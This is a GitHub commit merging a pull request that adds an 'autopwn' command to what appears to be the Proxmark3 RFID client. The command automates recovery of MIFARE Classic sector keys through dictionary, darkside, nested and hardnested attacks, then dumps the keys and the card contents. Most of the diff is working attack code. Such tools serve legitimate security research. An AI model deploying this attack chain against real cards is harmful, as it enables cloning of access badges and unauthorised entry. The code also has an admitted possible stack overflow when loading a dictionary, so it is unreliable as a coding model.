Merge pull request from matthiaskonrath/hardnested_autopwn

Autopwn
This commit is contained in:
Iceman 2019-08-26 15:12:21 +02:00 committed by GitHub
commit d548b8daeb
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
4 changed files with 624 additions and 52 deletions

View file

@ -3,7 +3,7 @@ All notable changes to this project will be documented in this file.
This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log...
## [unreleased][unreleased]
- Add autopwn command to break mifare classic cards completely automatic (breaks all sector keys and dumps them and the card content)
- Add Lua paths: look for scripts also in ~/.proxmark/lua{scripts,libs} and /usr/local/share/proxmark3/lua{scripts,libs} (@doegox)
- Change Lua directory scripts/ to luascript/ (@doegox)
- Change non-rdv4 PLATFORM must now use the generic PM3OTHER, simpler (@doegox)

View file

@ -166,6 +166,44 @@ static int usage_hf14_hardnested(void) {
PrintAndLogEx(NORMAL, " hf mf hardnested 0 A A0A1A2A3A4A5 4 A FFFFFFFFFFFF");
return 0;
}
static int usage_hf14_autopwn(void) {
PrintAndLogEx(NORMAL, "Usage:");
PrintAndLogEx(NORMAL, " hf mf autopwn [k] <sector number> <key A|B> <key (12 hex symbols)>");
PrintAndLogEx(NORMAL, " [*] <card memory> [f] <dictionary>.dic [s] [i] [l] [v]");
PrintAndLogEx(NORMAL, "");
PrintAndLogEx(NORMAL, "Description:");
PrintAndLogEx(NORMAL, " This command is used to automate the attack process on mifare classic nfc cards.");
PrintAndLogEx(NORMAL, " The program tries to identify the prng type and then automatically attack it with the best algorithm.");
PrintAndLogEx(NORMAL, " After the program is done, the keys and card data is dumped.");
PrintAndLogEx(NORMAL, "");
PrintAndLogEx(NORMAL, "Options:");
PrintAndLogEx(NORMAL, " h this help");
PrintAndLogEx(NORMAL, " k <sector> <keytype> <key> if a known key for a block is supplied");
PrintAndLogEx(NORMAL, " f <name>.dic dictionary file for key discovery (the file has to end in .dic) max 2000 entries allowed");
PrintAndLogEx(NORMAL, " s slower acquisition (required by some non standard cards) for hardnested");
PrintAndLogEx(NORMAL, " v verbose output (statistcs)");
PrintAndLogEx(NORMAL, " l legacy mode (use the slow mfchk for the key enumeration)");
PrintAndLogEx(NORMAL, " * <X> all sectors based on card memory, other values then below defaults to 1k");
PrintAndLogEx(NORMAL, " * 0 = MINI(320 bytes)");
PrintAndLogEx(NORMAL, " * 1 = 1K");
PrintAndLogEx(NORMAL, " * 2 = 2K");
PrintAndLogEx(NORMAL, " * 4 = 4K");
PrintAndLogEx(NORMAL, " i <X> set type of SIMD instructions. Without this flag programs autodetect it. (for hardnested)");
PrintAndLogEx(NORMAL, " i 5 = AVX512");
PrintAndLogEx(NORMAL, " i 2 = AVX2");
PrintAndLogEx(NORMAL, " i a = AVX");
PrintAndLogEx(NORMAL, " i s = SSE2");
PrintAndLogEx(NORMAL, " i m = MMX");
PrintAndLogEx(NORMAL, " i n = none (use CPU regular instruction set)");
PrintAndLogEx(NORMAL, "");
PrintAndLogEx(NORMAL, "Examples:");
PrintAndLogEx(NORMAL, " hf mf autopwn");
PrintAndLogEx(NORMAL, " hf mf autopwn * 1 f default_keys");
PrintAndLogEx(NORMAL, " hf mf autopwn k 0 A FFFFFFFFFFFF");
PrintAndLogEx(NORMAL, " hf mf autopwn k 0 A FFFFFFFFFFFF * 1 f default_keys");
PrintAndLogEx(NORMAL, " hf mf autopwn k 0 A FFFFFFFFFFFF * 4 i 5");
return 0;
}
static int usage_hf14_chk(void) {
PrintAndLogEx(NORMAL, "Usage: hf mf chk [h] <block number>|<*card memory> <key type (A/B/?)> [t|d] [<key (12 hex symbols)>] [<dic (*.dic)>]");
PrintAndLogEx(NORMAL, "Options:");
@ -1530,6 +1568,547 @@ static int CmdHF14AMfNestedHard(const char *Cmd) {
return 0;
}
static int CmdHF14AMfAutoPWN(const char *Cmd) {
// Nested and Hardnested parameter
uint8_t blockNo = 0;
uint8_t keyType = 0;
uint8_t key[6] = {0};
uint64_t key64 = 0;
bool calibrate = true;
// Attack key storage variables
uint8_t *keyBlock;
uint16_t key_cnt = 0;
sector_t *e_sector;
uint8_t sectors_cnt = MIFARE_1K_MAXSECTOR;
int block_cnt = MIFARE_1K_MAXBLOCK;
uint8_t tmp_key[6] = {0};
size_t data_length = 0;
bool know_target_key = false;
// For the timier
uint64_t t1;
// Parameters and dictionary file
char filename[FILE_PATH_SIZE] = {0};
uint8_t cmdp = 0;
char ctmp;
// Nested and Hardnested returned status
uint64_t foundkey = 0;
int16_t isOK = 0;
// Loop counter
int i, i2, i3;
int current_sector_i = 0, current_key_type_i = 0;
// Dumping and transfere to simulater memory
uint8_t block[16] = {0x00};
uint8_t *dump;
int bytes;
char* fnameptr = filename;
// Settings
bool slow = false;
bool legacy_mfchk = false;
bool prng_type = false;
bool verbose = false;
int max_dictionary_size = 2000;
// Parse the options given by the user
ctmp = tolower(param_getchar(Cmd, 0));
while ((ctmp = param_getchar(Cmd, cmdp))) {
switch (tolower(ctmp)) {
case 'h':
return usage_hf14_autopwn();
case 'f':
if (param_getstr(Cmd, cmdp +1, filename, FILE_PATH_SIZE) >= FILE_PATH_SIZE) {
PrintAndLogEx(FAILED, "Filename too long");
}
cmdp ++;
break;
case 'l':
legacy_mfchk = true;
break;
case 'v':
verbose = true;
break;
case '*':
// Get the number of sectors
sectors_cnt = NumOfSectors(param_getchar(Cmd, cmdp + 1));
block_cnt = NumOfBlocks(param_getchar(Cmd, cmdp + 1));
cmdp ++;
break;
case 'k':
// Get the known block number
if (param_getchar(Cmd, cmdp + 1) == 0x00) {
PrintAndLogEx(WARNING, "Sector number is missing");
return 1;
}
blockNo = param_get8(Cmd, cmdp + 1);
// Get the knonwn block type
ctmp = tolower(param_getchar(Cmd, cmdp + 2));
if (ctmp != 'a' && ctmp != 'b') {
PrintAndLogEx(WARNING, "Key type must be A or B");
return 1;
}
if (ctmp != 'a') {
keyType = 1;
}
// Get the known block key
if (param_gethex(Cmd, cmdp + 3, key, 12)) {
PrintAndLogEx(WARNING, "Key must include 12 HEX symbols");
return 1;
}
know_target_key = true;
cmdp += 3;
case 's':
slow = true;
break;
case 'i':
SetSIMDInstr(SIMD_AUTO);
ctmp = tolower(param_getchar(Cmd, cmdp + 1));
switch (ctmp) {
case '5':
SetSIMDInstr(SIMD_AVX512);
break;
case '2':
SetSIMDInstr(SIMD_AVX2);
break;
case 'a':
SetSIMDInstr(SIMD_AVX);
break;
case 's':
SetSIMDInstr(SIMD_SSE2);
break;
case 'm':
SetSIMDInstr(SIMD_MMX);
break;
case 'n':
SetSIMDInstr(SIMD_NONE);
break;
default:
PrintAndLogEx(WARNING, "Unknown SIMD type. %c", ctmp);
return 1;
}
cmdp += 2;
break;
default:
PrintAndLogEx(WARNING, "Unknown parameter '%c'\n", ctmp);
usage_hf14_hardnested();
return 1;
}
cmdp++;
}
// Create the key storage stucture
e_sector = calloc(sectors_cnt, sizeof(sector_t));
if (e_sector == NULL) return PM3_EMALLOC;
// Clear the key storage datastructure
for (i=0; i<sectors_cnt; i++) {
for (i2=0; i2<2; i2++) {
e_sector[i].Key[i2] = 0;
e_sector[i].foundKey[i2] = 0;
}
}
// Get the card prng type (weak=true / hard=false)
prng_type = detect_classic_prng();
// Print operating parameters
if (verbose) {
PrintAndLogEx(INFO, "[ SETTINGS ] Card sectors .. " _YELLOW_("%d"), sectors_cnt);
PrintAndLogEx(INFO, "[ SETTINGS ] Key supplied .. " _YELLOW_("%s"), know_target_key ? "True" : "False");
PrintAndLogEx(INFO, "[ SETTINGS ] Known sector .. " _YELLOW_("%d"), blockNo);
PrintAndLogEx(INFO, "[ SETTINGS ] Keytype ....... " _YELLOW_("%c"), keyType ? 'B' : 'A');
PrintAndLogEx(INFO, "[ SETTINGS ] Kown key ...... " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"), key[0], key[1], key[2], key[3], key[4], key[5]);
PrintAndLogEx(INFO, "[ SETTINGS ] Card PRNG ..... " _YELLOW_("%s"), prng_type ? "WEAK" : "HARD");
PrintAndLogEx(INFO, "[ SETTINGS ] Dictionary .... " _YELLOW_("%s"), strlen(filename) ? filename : "NONE");
PrintAndLogEx(INFO, "[ SETTINGS ] Legacy mode ... " _YELLOW_("%s"), legacy_mfchk ? "True" : "False");
}
// Check the user supplied key
if (know_target_key == false)
PrintAndLogEx(WARNING, "No known key was supplied, the following attacks might fail!");
else {
if (mfCheckKeys(FirstBlockOfSector(blockNo), keyType, true, 1, key, &key64) == PM3_SUCCESS) {
PrintAndLogEx(INFO, "[ SETTINGS ] The following key will be used for the nested / hardnested attack: sector:"
_RED_("%3d") " key type:"_RED_("%c") " key: " _RED_("0x%02x%02x%02x%02x%02x%02x"),
blockNo,
keyType ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
// Store the key for the nested / hardnested attack (if supplied by the user)
e_sector[blockNo].Key[keyType] = bytes_to_num(key, 6);
e_sector[blockNo].foundKey[keyType] = 3;
} else {
know_target_key = false;
PrintAndLogEx(FAILED, "Key is wrong. Can't authenticate to sector:"_RED_("%3d") " key type:"_RED_("%c") " key: " _RED_("0x%02x%02x%02x%02x%02x%02x"),
blockNo,
keyType ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
PrintAndLogEx(WARNING, "Let's see if just the sector or key type are not correct, and then we also give the dictionary a try ;)");
}
// Check if the user supplied key is used by other sectors
for (i=0; i<sectors_cnt; i++) {
for (i2=0; i2<2; i2++) {
if (e_sector[i].foundKey[i2] == 0) {
if (mfCheckKeys(FirstBlockOfSector(i), i2, true, 1, key, &key64) == PM3_SUCCESS) {
e_sector[i].Key[i2] = bytes_to_num(key, 6);
e_sector[i].foundKey[i2] = 4;
PrintAndLogEx(SUCCESS, "[ REUSED KEY ] Valid KEY FOUND: sector:%3d key type:%c key: " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"),
i,
i2 ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
// If the user supplied secctor / keytype was wrong --> just be nice and correct it ;)
if (know_target_key == false) {
num_to_bytes(e_sector[i].Key[i2], 6, key);
know_target_key = true;
blockNo = i; keyType = i2;
PrintAndLogEx(SUCCESS, "[ SETTINGS ] The following key will be used for the nested / hardnested attack: sector:"
_RED_("%3d") " key type:"_RED_("%c") " key: " _RED_("0x%02x%02x%02x%02x%02x%02x"),
blockNo,
keyType ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
}
}
}
}
}
}
// Load the dictionary
if (strlen(filename) != 0) {
keyBlock = calloc(6 * max_dictionary_size, sizeof(uint8_t));
loadFileDICTIONARY(filename, keyBlock, &data_length, 6, &key_cnt);
if ((data_length / 6) > max_dictionary_size) {
// This is not a good solution (loadFileDICTIONARY needs a maxdatalen)!
PrintAndLogEx(FAILED, "The loaded dictionary is too large: %d (allowed: %d)", data_length, max_dictionary_size);
free(keyBlock); // This won't work too well, because data on the stack is already overflown !!!
free(e_sector);
return 1;
}
} else {
keyBlock = calloc(ARRAYLEN(g_mifare_default_keys), 6);
if (keyBlock == NULL) {
free(e_sector);
return 1;
}
for (int cnt = 0; cnt < ARRAYLEN(g_mifare_default_keys); cnt++) {
num_to_bytes(g_mifare_default_keys[cnt], 6, keyBlock + cnt * 6);
}
key_cnt = ARRAYLEN(g_mifare_default_keys);
}
// Start the timer
t1 = msclock();
// Use the dictionary to find sector keys on the card
PrintAndLogEx(INFO, "Enumerating the card keys with the dictionary!");
if (legacy_mfchk) {
// Check all the sectors
for (i=0; i<sectors_cnt; i++) {
for (i2=0; i2<2; i2++) {
// Check if the key is known
if (e_sector[i].foundKey[i2] == 0) {
for (i3=0; i3<key_cnt; i3++) {
printf("."); fflush(stdout);
if (mfCheckKeys(FirstBlockOfSector(i), i2, true, 1, (keyBlock + (6*i3)), &key64) == PM3_SUCCESS) {
e_sector[i].Key[i2] = bytes_to_num((keyBlock + (6*i3)), 6);
e_sector[i].foundKey[i2] = 1;
break;
}
}
}
}
}
printf("\n"); fflush(stdout);
} else {
int chunksize = key_cnt > (PM3_CMD_DATA_SIZE / 6) ? (PM3_CMD_DATA_SIZE / 6) : key_cnt;
bool firstChunk = true, lastChunk = false;
for (uint8_t strategy = 1; strategy < 3; strategy++) {
PrintAndLogEx(INFO, "Running strategy %u", strategy);
// main keychunk loop
for (i = 0; i < key_cnt; i += chunksize) {
if (kbd_enter_pressed()) {
PrintAndLogEx(WARNING, "\naborted via keyboard!\n");
i = key_cnt; strategy = 3; break; // Exit the loop
}
uint32_t size = ((key_cnt - i) > chunksize) ? chunksize : key_cnt - i;
// last chunk?
if (size == key_cnt - i)
lastChunk = true;
int res = mfCheckKeys_fast(sectors_cnt, firstChunk, lastChunk, strategy, size, keyBlock + (i * 6), e_sector, false);
if (firstChunk)
firstChunk = false;
// all keys, aborted
if (res == 0 || res == 2) {
i = key_cnt; strategy = 3; break; // Exit the loop
}
} // end chunks of keys
firstChunk = true;
lastChunk = false;
} // end strategy
}
// Analyse the dictionary attack
for (i=0; i<sectors_cnt; i++) {
for (i2=0; i2<2; i2++) {
if (e_sector[i].foundKey[i2] == 1) {
num_to_bytes(e_sector[i].Key[i2], 6, tmp_key);
PrintAndLogEx(SUCCESS, "[ DICT. KEY ] Valid KEY FOUND: sector:%3d key type:%c key: " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"),
i,
i2 ? 'B' : 'A',
tmp_key[0], tmp_key[1], tmp_key[2], tmp_key[3], tmp_key[4], tmp_key[5]);
// Store vaild credentials for the nested / hardnested attack if none exist
if (know_target_key == false) {
num_to_bytes(e_sector[i].Key[i2], 6, key);
know_target_key = true;
blockNo = i; keyType = i2;
PrintAndLogEx(SUCCESS, "[ SETTINGS ] The following key will be used for the nested / hardnested attack: sector:"
_RED_("%3d") " key type:"_RED_("%c") " key: " _RED_("0x%02x%02x%02x%02x%02x%02x"),
blockNo,
keyType ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
}
}
}
}
// Check if at least one sector key was found
if (know_target_key == false) {
// Check if the darkside attack can be used
if (prng_type) {
PrintAndLogEx(INFO, "No key was found ... time to go to the dark side ;)");
int isOK = mfDarkside(FirstBlockOfSector(blockNo), keyType, &key64);
switch (isOK) {
case -1 :
PrintAndLogEx(WARNING, "\nButton pressed. Aborted.");
goto noValidKeyFound;
case -2 :
PrintAndLogEx(FAILED, "\nCard is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).");
goto noValidKeyFound;
case -3 :
PrintAndLogEx(FAILED, "\nCard is not vulnerable to Darkside attack (its random number generator is not predictable).");
goto noValidKeyFound;
case -4 :
PrintAndLogEx(FAILED, "\nCard is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown");
PrintAndLogEx(FAILED, "generating polynomial with 16 effective bits only, but shows unexpected behaviour.");
goto noValidKeyFound;
case -5 :
PrintAndLogEx(WARNING, "\nAborted via keyboard.");
goto noValidKeyFound;
default :
PrintAndLogEx(SUCCESS, "\nFound valid key: %012" PRIx64 "\n", key64);
break;
}
num_to_bytes(key64, 6, key);
// Check if the darkside key is vaild
if (mfCheckKeys(FirstBlockOfSector(blockNo), keyType, true, 1, key, &key64) != PM3_SUCCESS) {
PrintAndLogEx(FAILED, "The key generated by the darkside attack is not vaild!"
_RED_("%3d") " key type:"_RED_("%c") " key: " _RED_("0x%02x%02x%02x%02x%02x%02x"),
blockNo,
keyType ? 'B' : 'A',
key[0], key[1], key[2], key[3], key[4], key[5]);
goto noValidKeyFound;
}
// Store the keys
e_sector[blockNo].Key[keyType] = bytes_to_num(key, 6);
e_sector[blockNo].foundKey[keyType] = 2;
} else {
noValidKeyFound:
PrintAndLogEx(FAILED, "No usable key was found!");
free(keyBlock);
free(e_sector);
return 1;
}
}
free(keyBlock);
// Clear the needed variables
num_to_bytes(0, 6, tmp_key);
// Iterate over each sector and key(A/B)
for (current_sector_i=0; current_sector_i < sectors_cnt; current_sector_i++) {
for (current_key_type_i=0; current_key_type_i < 2; current_key_type_i++) {
// If the key is already known, just skip it
if (e_sector[current_sector_i].foundKey[current_key_type_i] == 0) {
// Try the found keys are reused
if (bytes_to_num(tmp_key, 6) != 0) {
// <!> The fast check --> mfCheckKeys_fast(sectors_cnt, true, true, 2, 1, tmp_key, e_sector, false);
// <!> Returns false keys, so we just stick to the slower mfchk.
for (i=0; i<sectors_cnt; i++) {
for (i2=0; i2<2; i2++) {
// Check if the sector key is already broken
if (e_sector[i].foundKey[i2] == 0) {
// Check if the key works
if (mfCheckKeys(FirstBlockOfSector(i), i2, true, 1, tmp_key, &key64) == PM3_SUCCESS) {
e_sector[i].Key[i2] = bytes_to_num(tmp_key, 6);
e_sector[i].foundKey[i2] = 4;
PrintAndLogEx(SUCCESS, "[ REUSED KEY ] Valid KEY FOUND: sector:%3d key type:%c key: " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"),
i,
i2 ? 'B' : 'A',
tmp_key[0], tmp_key[1], tmp_key[2], tmp_key[3], tmp_key[4], tmp_key[5]);
}
}
}
}
}
// Clear the last found key
num_to_bytes(0, 6, tmp_key);
// Use the nested / hardnested attack
if (e_sector[current_sector_i].foundKey[current_key_type_i] == 0) {
if (prng_type) {
PrintAndLogEx(INFO, "[ NESTED ] Sector no:%3d, target key type:%c",
current_sector_i,
current_key_type_i ? 'B' : 'A');
isOK = mfnested(FirstBlockOfSector(blockNo), keyType, key, FirstBlockOfSector(current_sector_i), current_key_type_i, tmp_key, calibrate);
switch (isOK) {
case -1 :
PrintAndLogEx(ERR, "\nError: No response from Proxmark3.");
free(e_sector);
return 1;
break;
case -2 :
PrintAndLogEx(WARNING, "\nButton pressed. Aborted.");
free(e_sector);
return 1;
break;
case -3 :
PrintAndLogEx(FAILED, "Tag isn't vulnerable to Nested Attack (PRNG is probably not predictable).");
PrintAndLogEx(FAILED, "Nested attack failed --> try hardnested instead!");
goto tryHardnested;
break;
case -4 : //key not found
calibrate = false;
PrintAndLogEx(FAILED, "Nested attack failed --> try hardnested instead!");
goto tryHardnested;
break;
case -5 :
calibrate = false;
e_sector[current_sector_i].Key[current_key_type_i] = bytes_to_num(tmp_key, 6);
e_sector[current_sector_i].foundKey[current_key_type_i] = 5;
break;
default :
PrintAndLogEx(ERR, "unknown Error.\n");
free(e_sector);
return 1;
break;
}
} else {
tryHardnested: // If the nested attack failes then we try the hardnested attack
PrintAndLogEx(INFO, "[ HARDNESTED ] Sector no:%3d, target key type:%c, Slow: %s",
current_sector_i,
current_key_type_i ? 'B' : 'A',
slow ? "Yes" : "No");
isOK = mfnestedhard(FirstBlockOfSector(blockNo), keyType, key, FirstBlockOfSector(current_sector_i), current_key_type_i, NULL, false, false, slow, 0, &foundkey, NULL);
DropField();
if (isOK) {
switch (isOK) {
case 1 :
PrintAndLogEx(ERR, "\nError: No response from Proxmark3.");
break;
case 2 :
PrintAndLogEx(NORMAL, "\nButton pressed. Aborted.");
break;
default :
break;
}
free(e_sector);
return 2;
}
// Copy the found key to the tmp_key variale (for the following print statement, and the mfCheckKeys above)
num_to_bytes(foundkey, 6, tmp_key);
e_sector[current_sector_i].Key[current_key_type_i] = foundkey;
e_sector[current_sector_i].foundKey[current_key_type_i] = 6;
}
// Check if the key was found
if (e_sector[current_sector_i].foundKey[current_key_type_i] != 0) {
PrintAndLogEx(SUCCESS, "[BROCKEN KEY] Valid KEY FOUND: sector:%3d key type:%c key: " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"),
current_sector_i,
current_key_type_i ? 'B' : 'A',
tmp_key[0], tmp_key[1], tmp_key[2], tmp_key[3], tmp_key[4], tmp_key[5]);
} else {
PrintAndLogEx(FAILED, "[BROCKEN KEY] Valid KEY NOT FOUND: sector:%3d key type:%c key: " _YELLOW_("0x%02x%02x%02x%02x%02x%02x"),
current_sector_i,
current_key_type_i ? 'B' : 'A',
tmp_key[0], tmp_key[1], tmp_key[2], tmp_key[3], tmp_key[4], tmp_key[5]);
}
}
}
}
}
// Show the results to the user
PrintAndLogEx(NORMAL, "");
PrintAndLogEx(INFO, "Found Keys:");
printKeyTable(sectors_cnt, e_sector);
if (verbose) {
PrintAndLogEx(INFO, "[ INFO ] Key res types:");
PrintAndLogEx(INFO, " 1: Dictionary");
PrintAndLogEx(INFO, " 2: Darkside attack");
PrintAndLogEx(INFO, " 3: User supplied");
PrintAndLogEx(INFO, " 4: Reused");
PrintAndLogEx(INFO, " 5: Nested");
PrintAndLogEx(INFO, " 6: Hardnested");
}
// Transfere the found keys to the simulator and dump the keys and card data
PrintAndLogEx(NORMAL, "");
PrintAndLogEx(INFO, "Dumping the keys:");
createMfcKeyDump(sectors_cnt, e_sector, GenerateFilename("hf-mf-", "-key.bin"));
PrintAndLogEx(SUCCESS, "Transfering the found keys to the simulator memory (Cmd Error: 04 can occour, but this shouldn't be a problem)");
for (current_sector_i=0; current_sector_i < sectors_cnt; current_sector_i++) {
mfEmlGetMem(block, current_sector_i, 1);
if (e_sector[current_sector_i].foundKey[0])
num_to_bytes(e_sector[current_sector_i].Key[0], 6, block);
if (e_sector[current_sector_i].foundKey[1])
num_to_bytes(e_sector[current_sector_i].Key[1], 6, block + 10);
mfEmlSetMem(block, FirstBlockOfSector(current_sector_i) + NumBlocksPerSector(current_sector_i) - 1, 1);
}
clearCommandBuffer();
SendCommandMIX(CMD_HF_MIFARE_EML_LOAD, sectors_cnt, 0, 0, NULL, 0);
clearCommandBuffer();
SendCommandMIX(CMD_HF_MIFARE_EML_LOAD, sectors_cnt, 1, 0, NULL, 0);
bytes = block_cnt * MFBLOCK_SIZE;
dump = calloc(bytes, sizeof(uint8_t));
if (!dump) {
PrintAndLogEx(WARNING, "Fail, cannot allocate memory");
free(e_sector);
return PM3_EMALLOC;
}
memset(dump, 0, bytes);
PrintAndLogEx(INFO, "Downloading the card content from emulator memory");
if (!GetFromDevice(BIG_BUF_EML, dump, bytes, 0, NULL, 0, NULL, 2500, false)) {
PrintAndLogEx(WARNING, "Fail, transfer from device time-out");
free(e_sector);
free(dump);
return PM3_ETIMEOUT;
}
fnameptr += sprintf(fnameptr, "hf-mf-");
FillFileNameByUID(fnameptr, dump, "-dump", 4);
saveFile(filename, ".bin", dump, bytes);
saveFileEML(filename, dump, bytes, MFBLOCK_SIZE);
saveFileJSON(filename, jsfCardMemory, dump, bytes);
// Generate and show statistics
t1 = msclock() - t1;
PrintAndLogEx(INFO, "Required time for the autopwn attack: " _YELLOW_("%.0f") " seconds", (float)t1 / 1000.0);
free(dump);
free(e_sector);
return 0;
}
/*
static int randInRange(int min, int max) {
return min + (int)(rand() / (double)(RAND_MAX) * (max - min + 1));
@ -1563,7 +2142,6 @@ static int CmdHF14AMfChk_fast(const char *Cmd) {
char filename[FILE_PATH_SIZE] = {0};
char buf[13];
char *fptr;
uint8_t tempkey[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
uint8_t *keyBlock, *p;
uint8_t sectorsCnt = 1;
int i, keycnt = 0;
@ -1784,30 +2362,7 @@ out:
if (createDumpFile) {
fptr = GenerateFilename("hf-mf-", "-key.bin");
if (fptr == NULL)
return 1;
FILE *fkeys = fopen(fptr, "wb");
if (fkeys == NULL) {
PrintAndLogEx(WARNING, "Could not create file " _YELLOW_("%s"), fptr);
free(keyBlock);
free(e_sector);
return 1;
}
PrintAndLogEx(SUCCESS, "Printing keys to binary file " _YELLOW_("%s")"...", fptr);
for (i = 0; i < sectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[0], 6, tempkey);
fwrite(tempkey, 1, 6, fkeys);
}
for (i = 0; i < sectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[1], 6, tempkey);
fwrite(tempkey, 1, 6, fkeys);
}
fclose(fkeys);
PrintAndLogEx(SUCCESS, "Found keys have been dumped to " _YELLOW_("%s")" --> 0xffffffffffff has been inserted for unknown keys.", fptr);
createMfcKeyDump(sectorsCnt, e_sector, fptr);
}
}
@ -1833,7 +2388,6 @@ static int CmdHF14AMfChk(const char *Cmd) {
uint8_t keyType = 0;
uint32_t keyitems = ARRAYLEN(g_mifare_default_keys);
uint64_t key64 = 0;
uint8_t tempkey[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
char *fptr;
int clen = 0;
int transferToEml = 0;
@ -2098,31 +2652,7 @@ out:
if (createDumpFile) {
fptr = GenerateFilename("hf-mf-", "-key.bin");
if (fptr == NULL) {
free(keyBlock);
free(e_sector);
return PM3_EFILE;
}
FILE *fkeys = fopen(fptr, "wb");
if (fkeys == NULL) {
PrintAndLogEx(WARNING, "Could not create file " _YELLOW_("%s"), fptr);
free(keyBlock);
free(e_sector);
return PM3_EFILE;
}
PrintAndLogEx(INFO, "Printing keys to binary file " _YELLOW_("%s")"...", fptr);
for (i = 0; i < SectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[0], 6, tempkey);
fwrite(tempkey, 1, 6, fkeys);
}
for (i = 0; i < SectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[1], 6, tempkey);
fwrite(tempkey, 1, 6, fkeys);
}
fclose(fkeys);
PrintAndLogEx(SUCCESS, "Found keys have been dumped to file " _YELLOW_("%s")". 0xffffffffffff has been inserted for unknown keys.", fptr);
createMfcKeyDump(SectorsCnt, e_sector, fptr);
}
free(keyBlock);
@ -3658,6 +4188,7 @@ static command_t CommandTable[] = {
{"darkside", CmdHF14AMfDarkside, IfPm3Iso14443a, "Darkside attack. read parity error messages."},
{"nested", CmdHF14AMfNested, IfPm3Iso14443a, "Nested attack. Test nested authentication"},
{"hardnested", CmdHF14AMfNestedHard, AlwaysAvailable, "Nested attack for hardened Mifare cards"},
{"autopwn", CmdHF14AMfAutoPWN, AlwaysAvailable, "Automatic attack tool, to extrackt the nfc keys (with dicrionaries, nested and hardnested attacks)"},
{"keybrute", CmdHF14AMfKeyBrute, IfPm3Iso14443a, "J_Run's 2nd phase of multiple sector nested authentication key recovery"},
{"nack", CmdHf14AMfNack, IfPm3Iso14443a, "Test for Mifare NACK bug"},
{"chk", CmdHF14AMfChk, IfPm3Iso14443a, "Check keys"},

View file

@ -311,6 +311,36 @@ out:
return retval;
}
int createMfcKeyDump(uint8_t sectorsCnt, sector_t *e_sector, char* fptr) {
uint8_t tmpKey[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
int i;
if (fptr == NULL) {
return 1;
}
FILE *fkeys = fopen(fptr, "wb");
if (fkeys == NULL) {
PrintAndLogEx(WARNING, "Could not create file " _YELLOW_("%s"), fptr);
return 1;
}
PrintAndLogEx(SUCCESS, "Printing keys to binary file " _YELLOW_("%s")"...", fptr);
for (i = 0; i < sectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[0], 6, tmpKey);
fwrite(tmpKey, 1, 6, fkeys);
}
for (i = 0; i < sectorsCnt; i++) {
num_to_bytes(e_sector[i].Key[1], 6, tmpKey);
fwrite(tmpKey, 1, 6, fkeys);
}
fclose(fkeys);
PrintAndLogEx(SUCCESS, "Found keys have been dumped to " _YELLOW_("%s")" --> 0xffffffffffff has been inserted for unknown keys.", fptr);
return 0;
}
int loadFile(const char *preferredName, const char *suffix, void *data, size_t maxdatalen, size_t *datalen) {
if (data == NULL) return 1;

View file

@ -47,6 +47,7 @@
#include "ui.h"
#include "emv/emvjson.h"
#include "mifare/mifare4.h"
#include "mifare/mifarehost.h"
#include "cmdhfmfu.h"
typedef enum {
@ -102,6 +103,16 @@ int saveFileEML(const char *preferredName, uint8_t *data, size_t datalen, size_t
*/
int saveFileJSON(const char *preferredName, JSONFileType ftype, uint8_t *data, size_t datalen);
/**
* @brief Utility function to save a keydump.
*
* @param sectorsCnt the used sectors
* @param e_sector the keys in question
* @param fptr string pointer to the filename
* @return 0 for ok, 1 for failz
*/
int createMfcKeyDump(uint8_t sectorsCnt, sector_t *e_sector, char* fptr);
/** STUB
* @brief Utility function to load data from a binary file. This method takes a preferred name.
* E.g. dumpdata-15.bin